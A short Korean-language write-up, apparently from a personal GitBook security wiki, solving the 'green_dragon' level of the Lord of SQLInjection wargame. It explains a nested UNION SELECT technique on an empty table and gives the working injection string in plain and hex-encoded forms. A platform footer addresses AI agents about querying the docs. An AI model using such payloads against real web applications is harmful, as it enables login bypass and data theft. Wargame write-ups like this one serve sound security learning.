> For the complete documentation index, see [llms.txt](https://docs.cooku222.kr/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://docs.cooku222.kr/security/web-hacking/lord-of-sql-injection/lord-of-sqlinjection-green_dragon.md). # \[Lord Of SQLInjection] green\_dragon

\- 문제 접근 \- union select 이용 -> 서로 다른 테이블에서 얻어온 칼럼을 하나의 단일 칼럼으로 만들어 주는 키워드 -> 이때, 불러오는 컬럼의 개수는 동일해야한다. -> prob\_green\_dragon 테이블이 비어있기 때문에, union select를 통해 값을 select하여 query 2에 id와 pw를 넣어준다. -> 첫번째 쿼리의 pw 입력에 union select를 이용해서, 두번째 쿼리의 id를 무력화시키고 (어차피 빈 테이블이므로), pw에 union select를 통해 admin id 를 select하면 해결됨 ASCII 코드 변환 전 ``` [도메인 값]?id=\&pw=union select \union select char(97,100,109,105,110)#' ``` ASCII 코드 변환 후 ``` [도메인 값]?id=\&pw=union select 0x5c,0x756e696f6e2073656c6563742030783631363436643639366523%23 ```

--- # Agent Instructions This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com. ## Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://docs.cooku222.kr/security/web-hacking/lord-of-sql-injection/lord-of-sqlinjection-green_dragon.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.